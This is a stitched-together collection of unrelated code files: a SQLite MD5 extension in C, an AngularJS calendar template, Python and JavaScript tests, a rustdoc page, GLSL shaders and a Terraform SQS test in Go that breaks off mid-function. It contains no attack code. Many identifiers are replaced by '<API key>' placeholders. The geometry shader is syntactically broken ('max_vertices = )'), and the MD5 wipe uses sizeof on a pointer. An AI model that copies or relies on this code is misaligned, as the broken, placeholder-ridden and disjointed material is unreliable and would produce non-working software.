* you just set "uint32" to the appropriate datatype for an
* unsigned 32-bit integer. For example:
*
* cc -Duint32='unsigned long' md5.c
*
*/
#ifndef uint32
# define uint32 unsigned int
#endif
// identifier Context is used in SQLite code
struct Context2 {
uint32 buf[4];
uint32 bits[2];
unsigned char in[64];
};
typedef char MD5Context[88];
/*
* Note: this code is harmless on little-endian machines.
*/
static void byteReverse (unsigned char *buf, unsigned longs){
uint32 t;
do {
t = (uint32)((unsigned)buf[3]<<8 | buf[2]) << 16 |
((unsigned)buf[1]<<8 | buf[0]);
*(uint32 *)buf = t;
buf += 4;
} while (--longs);
}
/* The four core functions - F1 is optimized somewhat */
/* #define F1(x, y, z) (x & y | ~x & z) */
#define F1(x, y, z) (z ^ (x & (y ^ z)))
#define F2(x, y, z) F1(z, x, y)
#define F3(x, y, z) (x ^ y ^ z)
#define F4(x, y, z) (y ^ (x | ~z))
/* This is the central step in the MD5 algorithm. */
#define MD5STEP(f, w, x, y, z, data, s) \
( w += f(x, y, z) + data, w = w<<s | w>>(32-s), w += x )
/*
* The core of the MD5 algorithm, this alters an existing MD5 hash to
* reflect the addition of 16 longwords of new data. MD5Update blocks
* the data and converts bytes into longwords for this routine.
*/
static void MD5Transform(uint32 buf[4], const uint32 in[16]){
register uint32 a, b, c, d;
a = buf[0];
b = buf[1];
c = buf[2];
d = buf[3];
MD5STEP(F1, a, b, c, d, in[ 0]+0xd76aa478, 7);
MD5STEP(F1, d, a, b, c, in[ 1]+0xe8c7b756, 12);
MD5STEP(F1, c, d, a, b, in[ 2]+0x242070db, 17);
MD5STEP(F1, b, c, d, a, in[ 3]+0xc1bdceee, 22);
MD5STEP(F1, a, b, c, d, in[ 4]+0xf57c0faf, 7);
MD5STEP(F1, d, a, b, c, in[ 5]+0x4787c62a, 12);
MD5STEP(F1, c, d, a, b, in[ 6]+0xa8304613, 17);
MD5STEP(F1, b, c, d, a, in[ 7]+0xfd469501, 22);
MD5STEP(F1, a, b, c, d, in[ 8]+0x698098d8, 7);
MD5STEP(F1, d, a, b, c, in[ 9]+0x8b44f7af, 12);
MD5STEP(F1, c, d, a, b, in[10]+0xffff5bb1, 17);
MD5STEP(F1, b, c, d, a, in[11]+0x895cd7be, 22);
MD5STEP(F1, a, b, c, d, in[12]+0x6b901122, 7);
MD5STEP(F1, d, a, b, c, in[13]+0xfd987193, 12);
MD5STEP(F1, c, d, a, b, in[14]+0xa679438e, 17);
MD5STEP(F1, b, c, d, a, in[15]+0x49b40821, 22);
MD5STEP(F2, a, b, c, d, in[ 1]+0xf61e2562, 5);
MD5STEP(F2, d, a, b, c, in[ 6]+0xc040b340, 9);
MD5STEP(F2, c, d, a, b, in[11]+0x265e5a51, 14);
MD5STEP(F2, b, c, d, a, in[ 0]+0xe9b6c7aa, 20);
MD5STEP(F2, a, b, c, d, in[ 5]+0xd62f105d, 5);
MD5STEP(F2, d, a, b, c, in[10]+0x02441453, 9);
MD5STEP(F2, c, d, a, b, in[15]+0xd8a1e681, 14);
MD5STEP(F2, b, c, d, a, in[ 4]+0xe7d3fbc8, 20);
MD5STEP(F2, a, b, c, d, in[ 9]+0x21e1cde6, 5);
MD5STEP(F2, d, a, b, c, in[14]+0xc33707d6, 9);
MD5STEP(F2, c, d, a, b, in[ 3]+0xf4d50d87, 14);
MD5STEP(F2, b, c, d, a, in[ 8]+0x455a14ed, 20);
MD5STEP(F2, a, b, c, d, in[13]+0xa9e3e905, 5);
MD5STEP(F2, d, a, b, c, in[ 2]+0xfcefa3f8, 9);
MD5STEP(F2, c, d, a, b, in[ 7]+0x676f02d9, 14);
MD5STEP(F2, b, c, d, a, in[12]+0x8d2a4c8a, 20);
MD5STEP(F3, a, b, c, d, in[ 5]+0xfffa3942, 4);
MD5STEP(F3, d, a, b, c, in[ 8]+0x8771f681, 11);
MD5STEP(F3, c, d, a, b, in[11]+0x6d9d6122, 16);
MD5STEP(F3, b, c, d, a, in[14]+0xfde5380c, 23);
MD5STEP(F3, a, b, c, d, in[ 1]+0xa4beea44, 4);
MD5STEP(F3, d, a, b, c, in[ 4]+0x4bdecfa9, 11);
MD5STEP(F3, c, d, a, b, in[ 7]+0xf6bb4b60, 16);
MD5STEP(F3, b, c, d, a, in[10]+0xbebfbc70, 23);
MD5STEP(F3, a, b, c, d, in[13]+0x289b7ec6, 4);
MD5STEP(F3, d, a, b, c, in[ 0]+0xeaa127fa, 11);
MD5STEP(F3, c, d, a, b, in[ 3]+0xd4ef3085, 16);
MD5STEP(F3, b, c, d, a, in[ 6]+0x04881d05, 23);
MD5STEP(F3, a, b, c, d, in[ 9]+0xd9d4d039, 4);
MD5STEP(F3, d, a, b, c, in[12]+0xe6db99e5, 11);
MD5STEP(F3, c, d, a, b, in[15]+0x1fa27cf8, 16);
MD5STEP(F3, b, c, d, a, in[ 2]+0xc4ac5665, 23);
MD5STEP(F4, a, b, c, d, in[ 0]+0xf4292244, 6);
MD5STEP(F4, d, a, b, c, in[ 7]+0x432aff97, 10);
MD5STEP(F4, c, d, a, b, in[14]+0xab9423a7, 15);
MD5STEP(F4, b, c, d, a, in[ 5]+0xfc93a039, 21);
MD5STEP(F4, a, b, c, d, in[12]+0x655b59c3, 6);
MD5STEP(F4, d, a, b, c, in[ 3]+0x8f0ccc92, 10);
MD5STEP(F4, c, d, a, b, in[10]+0xffeff47d, 15);
MD5STEP(F4, b, c, d, a, in[ 1]+0x85845dd1, 21);
MD5STEP(F4, a, b, c, d, in[ 8]+0x6fa87e4f, 6);
MD5STEP(F4, d, a, b, c, in[15]+0xfe2ce6e0, 10);
MD5STEP(F4, c, d, a, b, in[ 6]+0xa3014314, 15);
MD5STEP(F4, b, c, d, a, in[13]+0x4e0811a1, 21);
MD5STEP(F4, a, b, c, d, in[ 4]+0xf7537e82, 6);
MD5STEP(F4, d, a, b, c, in[11]+0xbd3af235, 10);
MD5STEP(F4, c, d, a, b, in[ 2]+0x2ad7d2bb, 15);
MD5STEP(F4, b, c, d, a, in[ 9]+0xeb86d391, 21);
buf[0] += a;
buf[1] += b;
buf[2] += c;
buf[3] += d;
}
/*
* Start MD5 accumulation. Set bit count to 0 and buffer to mysterious
* initialization constants.
*/
static void MD5Init(MD5Context *pCtx){
struct Context2 *ctx = (struct Context2 *)pCtx;
ctx->buf[0] = 0x67452301;
ctx->buf[1] = 0xefcdab89;
ctx->buf[2] = 0x98badcfe;
ctx->buf[3] = 0x10325476;
ctx->bits[0] = 0;
ctx->bits[1] = 0;
}
/*
* Update context to reflect the concatenation of another buffer full
* of bytes.
*/
static
void MD5Update(MD5Context *pCtx, const unsigned char *buf, unsigned int len){
struct Context2 *ctx = (struct Context2 *)pCtx;
uint32 t;
/* Update bitcount */
t = ctx->bits[0];
if ((ctx->bits[0] = t + ((uint32)len << 3)) < t)
ctx->bits[1]++; /* Carry from low to high */
ctx->bits[1] += len >> 29;
t = (t >> 3) & 0x3f; /* Bytes already in shsInfo->data */
/* Handle any leading odd-sized chunks */
if ( t ) {
unsigned char *p = (unsigned char *)ctx->in + t;
t = 64-t;
if (len < t) {
memcpy(p, buf, len);
return;
}
memcpy(p, buf, t);
byteReverse(ctx->in, 16);
MD5Transform(ctx->buf, (uint32 *)ctx->in);
buf += t;
len -= t;
}
/* Process data in 64-byte chunks */
while (len >= 64) {
memcpy(ctx->in, buf, 64);
byteReverse(ctx->in, 16);
MD5Transform(ctx->buf, (uint32 *)ctx->in);
buf += 64;
len -= 64;
}
/* Handle any remaining bytes of data. */
memcpy(ctx->in, buf, len);
}
/*
* Final wrapup - pad to 64-byte boundary with the bit pattern
* 1 0* (64-bit count of bits processed, MSB-first)
*/
static void MD5Final(unsigned char digest[16], MD5Context *pCtx){
struct Context2 *ctx = (struct Context2 *)pCtx;
unsigned count;
unsigned char *p;
/* Compute number of bytes mod 64 */
count = (ctx->bits[0] >> 3) & 0x3F;
/* Set the first char of padding to 0x80. This is safe since there is
always at least one byte free */
p = ctx->in + count;
*p++ = 0x80;
/* Bytes of padding needed to make 64 bytes */
count = 64 - 1 - count;
/* Pad out to 56 mod 64 */
if (count < 8) {
/* Two lots of padding: Pad the first block to 64 bytes */
memset(p, 0, count);
byteReverse(ctx->in, 16);
MD5Transform(ctx->buf, (uint32 *)ctx->in);
/* Now fill the next block with 56 bytes */
memset(ctx->in, 0, 56);
} else {
/* Pad block to 56 bytes */
memset(p, 0, count-8);
}
byteReverse(ctx->in, 14);
/* Append length in bits and transform */
((uint32 *)ctx->in)[ 14 ] = ctx->bits[0];
((uint32 *)ctx->in)[ 15 ] = ctx->bits[1];
MD5Transform(ctx->buf, (uint32 *)ctx->in);
byteReverse((unsigned char *)ctx->buf, 4);
memcpy(digest, ctx->buf, 16);
memset(ctx, 0, sizeof(ctx)); /* In case it's sensitive */
}
/*
** During testing, the special md5sum() aggregate function is available.
** inside SQLite. The following routines implement that function.
*/
static void md5step(sqlite3_context *context, int argc, sqlite3_value **argv){
MD5Context *p;
int i;
if( argc<1 ) return;
p = <API key>(context, sizeof(*p));
if( p==0 ) return;
if( <API key>(context)==1 ){
MD5Init(p);
}
for(i=0; i<argc; i++){
const char *zData = (char*)sqlite3_value_blob(argv[i]);
if( zData ){
// MD5Update(p, (unsigned char*)zData, strlen(zData));
MD5Update(p, (unsigned char*)zData, sqlite3_value_bytes(argv[i]));
}
}
}
static void md5finalize(sqlite3_context *context){
MD5Context *p;
unsigned char digest[16];
p = <API key>(context, sizeof(*p));
MD5Final(digest,p);
sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
static void md5(sqlite3_context *context, int argc, sqlite3_value **argv){
MD5Context ctx;
unsigned char digest[16];
int i;
if( argc<1 ) return;
if( sqlite3_value_type(argv[0]) == SQLITE_NULL ){
sqlite3_result_null(context);
return;
}
MD5Init(&ctx);
// MD5Update(&ctx, (unsigned char*)sqlite3_value_blob(argv[0]), sqlite3_value_bytes(argv[0]));
for(i=0; i<argc; i++){
const char *zData = (char*)sqlite3_value_blob(argv[i]);
if( zData ){
MD5Update(&ctx, (unsigned char*)zData, sqlite3_value_bytes(argv[i]));
}
}
MD5Final(digest,&ctx);
sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
/*
** A command to take the md5 hash of a file. The argument is the
** name of the file.
*/
static void md5file(sqlite3_context *context, int argc, sqlite3_value **argv){
FILE *in;
MD5Context ctx;
unsigned char digest[16];
char zBuf[10240];
if( sqlite3_value_type(argv[0]) == SQLITE_NULL ){
// file name not defined
sqlite3_result_null(context);
return;
}
in = fopen((unsigned char *)sqlite3_value_text(argv[0]),"rb");
if( in==0 ){
//unable to open file for reading
sqlite3_result_null(context);
return;
}
MD5Init(&ctx);
for(;;){
int n;
n = fread(zBuf, 1, sizeof(zBuf), in);
if( n<=0 ) break;
MD5Update(&ctx, (unsigned char*)zBuf, (unsigned)n);
}
fclose(in);
MD5Final(digest, &ctx);
sqlite3_result_blob(context, digest, sizeof(digest), SQLITE_TRANSIENT);
}
/* SQLite invokes this routine once when it loads the extension.
** Create new functions, collating sequences, and virtual table
** modules here. This is usually the only exported symbol in
** the shared library.
*/
int sqlite3Md5Init(sqlite3 *db){
<API key>(db, "group_md5", -1, SQLITE_UTF8, 0, 0, md5step, md5finalize);
<API key>(db, "md5", -1, SQLITE_UTF8, 0, md5, 0, 0);
<API key>(db, "md5file", 1, SQLITE_UTF8, 0, md5file, 0, 0);
return 0;
}
#if !SQLITE_CORE
int <API key>(
sqlite3 *db,
char **pzErrMsg,
const <API key> *pApi
){
<API key>(pApi)
return sqlite3Md5Init(db);
}
#endif
#endif
int auto_extension() {
return <API key>( (void(*)(void))<API key> );
} |
<!--<md-content layout='column' layout-fill md-swipe-left='next()' md-swipe-right='prev()'>-->
<md-content layout='column' layout-fill>
<md-toolbar class="md-accent">
<div class='md-toolbar-tools' layout='row'>
<md-button class="md-icon-button" ng-click='prev()' aria-label="Previous month">
<md-tooltip ng-if="::tooltips()">Previous month</md-tooltip>
<md-icon md-font-icon="icon-chevron-right" ></md-icon>
</md-button>
<div flex></div>
<h2 class='calendar-md-title'><span>{{ calendar.start | date:titleFormat:timezone }}</span></h2>
<div flex></div>
<md-button class="md-icon-button" ng-click='next()' aria-label="Next month">
<md-tooltip ng-if="::tooltips()">Next month</md-tooltip>
<md-icon md-font-icon="icon-chevron-left" class="moveNext"></md-icon>
</md-button>
</div>
</md-toolbar>
<!-- agenda view -->
<md-content ng-if='weekLayout === columnWeekLayout' class='agenda'>
<div ng-repeat='week in calendar.weeks track by $index'>
<div ng-if="sameMonth(day)" ng-class='{"disabled" : isDisabled(day), active: active === day, "has-events": hasEvents(day) }' ng-repeat='day in week' layout>
<md-tooltip ng-if="::tooltips()">{{ day | date:dayTooltipFormat:timezone }}</md-tooltip>
<div>{{ day | date:dayFormat:timezone }}</div>
<div flex compile='dataService.data[dayKey(day)]'></div>
</div>
</div>
</md-content>
<!-- calendar view -->
<md-content ng-if='weekLayout !== columnWeekLayout' flex layout="column" class='calendar'>
<div layout='row' class='subheader'>
<div layout-padding class='subheader-day' flex ng-repeat='day in calendar.weeks[0]'>
<md-tooltip ng-if="::tooltips()">{{ day | date:<API key> }}</md-tooltip>
{{ day | date:dayLabelFormat }}
</div>
</div>
<div ng-if='week.length' ng-repeat='week in calendar.weeks track by $index' flex layout='row'>
<div tabindex='{{ sameMonth(day) ? (day | date:dayFormat:timezone) : 0 }}' ng-repeat='day in week track by $index' flex layout layout-padding ng-class='{"disabled" : isDisabled(day), "active": isActive(day), "has-events": hasEvents(day), "md-whiteframe-12dp": hover || focus }' >
<md-tooltip ng-if="::tooltips()">{{ day | date:dayTooltipFormat }}</md-tooltip>
<div>{{ day | date:dayFormat }}</div>
<div flex compile='dataService.data[dayKey(day)]' id='{{ day | date:dayIdFormat }}'></div>
</div>
</div>
</md-content>
</md-content> |
from elasticsearch_dsl import query
from kuma.core.tests import eq_, ok_
from kuma.wiki.search import WikiDocumentType
from . import ElasticTestCase
class <API key>(ElasticTestCase):
fixtures = ElasticTestCase.fixtures + ['wiki/documents.json']
def <API key>(self):
self.refresh()
results = WikiDocumentType.search().query('match', content='audio')
ok_(results.count() > 0)
for doc in results.execute():
excerpt = doc.get_excerpt()
ok_('audio' in excerpt)
ok_('<strong>' not in excerpt)
def <API key>(self):
self.refresh()
results = (WikiDocumentType.search()
.query(query.Match(title='article') |
query.Match(content='article'))
.filter('term', locale='en-US'))
for doc in results.execute():
eq_('en-US', doc.locale)
def <API key>(self):
self.refresh()
results = WikiDocumentType.search().query('match', content='audio')
ok_(results.count() > 0)
for doc in results.execute():
excerpt = doc.get_excerpt()
ok_('the word for tough things' in excerpt)
ok_('extra content' not in excerpt)
def <API key>(self):
self.refresh()
title_list = WikiDocumentType.get_indexable().values_list('title',
flat=True)
ok_('User:jezdez' not in title_list) |
/* vim: set ft=javascript ts=2 et sw=2 tw=80: */
"use strict";
// Tests that the rule view strict search filter works properly for stylesheet
// source.
const SEARCH = "`doc_urls_clickable.css:1`";
const TEST_URI = URL_ROOT + "doc_urls_clickable.html";
add_task(function* () {
yield addTab(TEST_URI);
let {inspector, view} = yield openRuleView();
yield selectNode(".relative1", inspector);
yield testAddTextInFilter(inspector, view);
});
function* testAddTextInFilter(inspector, view) {
yield setSearchFilter(view, SEARCH);
info("Check that the correct rules are visible");
is(view.element.children.length, 2, "Should have 2 rules.");
is(<API key>(view, 0).rule.selectorText, "element",
"First rule is inline element.");
let rule = <API key>(view, 1).rule;
let source = rule.textProps[0].editor.ruleEditor.source;
is(rule.selectorText, ".relative1", "Second rule is .relative1.");
ok(source.classList.contains("ruleview-highlight"),
"stylesheet source is correctly highlighted.");
} |
package org.miloss.fgsms.plugins.sla.alertservice; |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `is_loaded` fn in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, is_loaded">
<title>gleam::ffi::DrawArrays::is_loaded - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>DrawArrays</a></p><script>window.sidebarCurrent = {name: 'is_loaded', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>DrawArrays</a>::<wbr><a class='fn' href=''>is_loaded</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-34898' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#9804-9806' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn is_loaded() -> <a href='../../../std/primitive.bool.html'>bool</a></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
#include "shaders.h"
namespace Yuni
{
namespace Gfx3D
{
//////////// VERTEX SHADERS
// Minimal vertex shader : only transform the vertex coordinates
const char* const vsTransform =
R"(
#version 130
in vec3 attrVertex;
// Minimal vertex shader : only transform the vertex coordinates
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";
// Very simple vertex shader : transform coordinates and propagate texture coordinates
const char* const vsTexCoord =
R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
// Very simple vertex shader : transform coordinates and propagate texture coordinates
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
texCoord = attrTexCoord;
}
)";
// For 2D post shaders, texture coordinates are calculated by transforming vertex position
// from [-1,1] to [0,1]
const char* const vs2D =
R"(
#version 130
in vec2 attrVertex;
out vec2 texCoord;
// For 2D post shaders, texture coordinates are calculated by transforming vertex position
// from [-1,1] to [0,1]
void main()
{
gl_Position = vec4(attrVertex, 0.0f, 1.0f);
texCoord = (attrVertex + 1.0) / 2.0;
}
)";
// Pass the color as attribute
const char* const vsColorAttr =
R"(
#version 130
in vec3 attrVertex;
in vec4 attrColor;
out vec4 color;
// Pass the color as attribute
void main()
{
color = attrColor;
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";
// Sample a texture using a rectangle, do not resize the image, fill empty parts with a color
const char* const vsImageRectWithGeom =
R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
out bool hasBlank; // The rect leaves some blank on the borders
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
// Use a rectangle overlay over a texture, store which parts of the overlay are out of bounds
void main()
{
texCoord = attrTexCoord;
vec4 vertex = vec4(attrVertex, 1.0f);
hasBlank = (vertex.x < Bounds.x || vertex.x > Bounds.z || vertex.y < Bounds.y || vertex.y > Bounds.w) ? 1.0f : 0.0f;
gl_Position = <API key> * vertex;
}
)";
const char* const vsImageRect =
R"(
#version 130
in vec3 attrVertex;
in vec2 attrTexCoord;
out vec2 texCoord;
out float isEmpty; // Used as a boolean (0 = false, 1 = true)
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
// Use a rectangle overlay over a texture, store which parts of the overlay are out of bounds
void main()
{
texCoord = attrTexCoord;
vec4 vertex = vec4(attrVertex, 1.0f);
isEmpty = (vertex.x < Bounds.x || vertex.x > Bounds.z || vertex.y < Bounds.y || vertex.y > Bounds.w) ? 1.0f : 0.0f;
gl_Position = <API key> * vertex;
}
)";
// Phong shading
const char* const vsPhong =
R"(
#version 130
const uint MAX_LIGHTS = 4u;
in vec3 attrVertex;
in vec3 attrNormal;
in vec2 attrTexCoord;
out vec3 vertex;
out vec3 normal;
out vec2 texCoord;
uniform uint LightCount;
uniform vec4 LightPosition[MAX_LIGHTS];
const vec3 pos = vec3(-0.5, 0.5, 0.0);
// Vertex shader for Phong shading with several lights
void main(void)
{
vertex = vec3(gl_ModelViewMatrix * vec4(attrVertex, 1));
normal = normalize(gl_NormalMatrix * attrNormal);
texCoord = attrTexCoord;
// for (uint i = 0u; i < LightCount; ++i)
// vec3 lightPos = vec3(gl_ModelViewMatrix * LightPosition[i]);
// // Directional
// lightDir[i] = normalize(-lightPos);
// // Omni / Point
// // lightDir[i] = normalize(lightPos - vertex);
//lightDir0 = normalize(vec3(gl_ModelViewMatrix * vec4(pos, 0.0)));
gl_Position = <API key> * vec4(attrVertex, 1.0f);
}
)";
const char* const vsCubeMap =
R"(
#version 130
in vec3 attrVertex;
out vec3 texCoord;
// 3D texture coordinates for a cubemap are actually the vertex' position
void main()
{
gl_Position = <API key> * vec4(attrVertex, 1.0f);
texCoord = normalize(attrVertex);
}
)";
//////////// FRAGMENT SHADERS
// Use a single color given as uniform
const char* const fsColorUniform =
R"(
#version 130
out vec4 gl_FragColor;
uniform vec4 Color;
// Use a single color given as uniform
void main()
{
gl_FragColor = Color;
}
)";
// Use a single color given as attribute
const char* const fsColorAttr =
R"(
#version 130
in vec4 color;
out vec4 gl_FragColor;
// Use color passed as an attribute
void main()
{
gl_FragColor = color;
}
)";
// Use directly the texture value, no lighting
const char* const fsSimpleTexture =
R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
// Use directly the texture value, no lighting
void main()
{
gl_FragColor = texture(Texture0, texCoord);
}
)";
// Sample a texture using a rectangle, do not resize the image, fill empty parts with a color
const char* const fsImageRect =
R"(
#version 130
in vec2 texCoord;
in float isEmpty; // Used as a boolean (0 = false, 1 = true)
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform vec4 FillColor = vec4(0.0f, 0.0f, 0.0f, 0.0f); // Full transparent
uniform float Opacity = 1.0f; // Opaque
void main()
{
// Sample the texture
vec4 texColor = texture(Texture0, texCoord);
// Multiply by the given opacity
texColor = vec4(texColor.rgb, texColor.a * Opacity);
// Take either the texture color or the fill color depending on if we are out of bounds
gl_FragColor = mix(texColor, FillColor, isEmpty);
}
)";
// Freetype with normal render mode generates alpha-only bitmaps, stored as GL_R textures
// This shader displays them with the proper color.
const char* const fsText =
R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform sampler2D Texture1;
uniform vec4 TextColor = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 BackColor = vec4(0.0f, 0.0f, 0.0f, 1.0f); // Black
uniform float HasBGColor = 0.0f;
// Freetype with normal render mode generates alpha-only bitmaps, stored as GL_R textures
// This shader displays them with the proper color.
void main(void)
{
vec4 alpha = texture(Texture0, texCoord);
//vec4 material = texture(Texture1, texCoord);
vec4 withBGColor = mix(BackColor, TextColor, alpha.r);
vec4 withoutBGColor = vec4(TextColor.r, TextColor.g, TextColor.b, TextColor.a * alpha.r);
gl_FragColor = mix(withoutBGColor, withBGColor, HasBGColor);
}
)";
// Color picking
const char* const fsPicking =
R"(
#version 410
out vec4 gl_FragColor;
// uint is 32-bit
uniform uint ObjectID = 0u;
// Color picking
void main()
{
float highest = (ObjectID >> 24u) / 255.0f;
float high = ((ObjectID >> 16u) & 0xff) / 255.0f;
float low = ((ObjectID >> 8u) & 0xff) / 255.0f;
float lowest = (ObjectID & 0xff) / 255.0f;
gl_FragColor = vec4(highest, high, low, lowest);
}
)";
// Skybox : cube map sampling
const char* const fsSkybox =
R"(
#version 130
in vec3 texCoord;
out vec4 gl_FragColor;
uniform samplerCube Texture0;
// Cube map access
void main()
{
gl_FragColor = texture(Texture0, texCoord);
}
)";
// Phong shading
const char* const fsPhong =
R"(
#version 130
const uint MAX_LIGHTS = 4u;
in vec3 vertex;
in vec3 normal;
in vec2 texCoord;
out vec4 gl_FragColor;
uniform sampler2D Texture0;
uniform sampler2D Texture1;
uniform sampler2D Texture2;
uniform uint LightCount;
uniform vec4 LightPosition[MAX_LIGHTS];
uniform vec4 LightDiffuse[MAX_LIGHTS];
uniform vec4 LightAmbient[MAX_LIGHTS];
uniform vec4 LightSpecular[MAX_LIGHTS];
uniform vec4 MaterialDiffuse = vec4(1.0f, 0.0f, 0.0f, 0.0f);
uniform vec4 MaterialAmbient = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 MaterialSpecular = vec4(1.0f, 1.0f, 1.0f, 1.0f);
uniform vec4 MaterialEmission = vec4(0.0f, 0.0f, 0.0f, 1.0f);
uniform float MaterialShininess;
// Phong shading with several lights
void main()
{
vec3 eye = normalize(-vertex); // we are in Eye Coordinates, so EyePos is (0,0,0)
vec4 texColor = vec4(texture2D(Texture0, texCoord).rgb, 1.0);
vec4 matColor = vec4(0, 0, 0, 0);
for (uint i = 0u; i < LightCount && i < MAX_LIGHTS; ++i)
{
vec3 L = normalize(vec3(gl_ModelViewMatrix * vec4(LightPosition[i].xyz, 0.0f)));
vec3 R = normalize(-reflect(L, normal));
// calculate Ambient Term:
matColor += LightAmbient[i] * MaterialAmbient;
// calculate Diffuse Term:
vec4 diff = LightDiffuse[i] * MaterialDiffuse * texColor * max(-dot(normal,L), 0.0);
diff = clamp(diff, 0.0, 1.0);
matColor += diff;
// calculate Specular Term:
//vec4 spec = LightSpecular[i] * MaterialSpecular * pow(max(dot(R, eye), 0.0), 0.3 * MaterialShininess);
vec4 spec = LightSpecular[i] * MaterialSpecular * max(pow(-dot(R, eye), MaterialShininess), 0.0);
spec = clamp(spec, 0.0, 1.0);
matColor += spec;
}
// write Total Color:
gl_FragColor = matColor;
}
)";
const char* const fsYuv2Rgb =
R"(
#version 130
in vec2 texCoord;
out vec4 gl_FragColor;
uniform uint PaddedWidth = 1u;
uniform uint Width = 1u; // The only important thing here is the Width / PaddedWidth ratio
uniform sampler2D TextureY;
uniform sampler2D TextureU;
uniform sampler2D TextureV;
void main()
{
// Correct horizontal texture coordinate to account for padding
vec2 fixedCoord = vec2(texCoord.s * Width / PaddedWidth, 1.0 - texCoord.t);
// Sample the texture
float y = texture2D(TextureY, fixedCoord).r;
float cb = texture2D(TextureU, fixedCoord).r;
float cr = texture2D(TextureV, fixedCoord).r;
y = 1.1643 * (y - 0.0625);
cb = cb - 0.5;
cr = cr - 0.5;
float r = y + 1.5958 * cr;
float g = y - 0.39173 * cb - 0.81290 * cr;
float b = y + 2.017 * cb;
gl_FragColor = vec4(r, g, b, 1.0);
}
)";
//////////// GEOMETRY SHADERS
// Generate empty borders for image rectangles
const char* const gsImageRect =
R"(
// Necessary version for the new geometry shader syntax
#version 150
layout(triangles) in;
layout(triangle_strip, max_vertices = ) out;
uniform vec4 Bounds; // Stored as (xMin, yMin, xMax, yMax)
in bool hasBlank[3]; // Which vertices leave blank on their side
in vec2 texCoord[3]; // Texture coordinates
out float isEmpty; // Used as a boolean (0 = false, 1 = true)
out vec3 texCoord[3];
void main()
{
vec4 vertex;
for (int i = 0; i < gl_in.length(); ++i)
{
gl_Position = gl_in[i].gl_Position;
isEmpty = false;
EmitVertex();
}
EndPrimitive();
for (int i = 0; i < gl_in.length(); ++i)
if (hasBlank[i])
{
}
}
)";
} // namespace Gfx3D
} // namespace Yuni |
package aws
import (
"fmt"
"testing"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/service/sqs"
"github.com/hashicorp/terraform/helper/resource"
"github.com/hashicorp/terraform/terraform"
)
func TestAccAWSSQSQueue(t *testing.T) {
resource.Test(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: <API key>,
Steps: []resource.TestStep{
resource.TestStep{
Config: <API key>,
Check: resource.<API key>(
<API key>("aws_sqs_queue.queue-with-defaults"),
),
},
resource.TestStep{
Config: <API key>,
Check: resource.<API key>(
<API key>("aws_sqs_queue.<API key>"),
),
},
},
})
}
func <API key>(s *terraform.State) error {
conn := testAccProvider.Meta().(*AWSClient).sqsconn
for _, rs := range s.RootModule().Resources {
if rs.Type != "aws_sqs_queue" {
continue
}
// Check if queue exists by checking for its attributes
params := &sqs.<API key>{
QueueURL: aws.String(rs.Primary.ID),
}
_, err := conn.GetQueueAttributes(params)
if err == nil {
return fmt.Errorf("Queue %s still exists. Failing!", rs.Primary.ID)
}
// Verify the error is what we want
_, ok := err.(awserr.Error)
if !ok {
return err
}
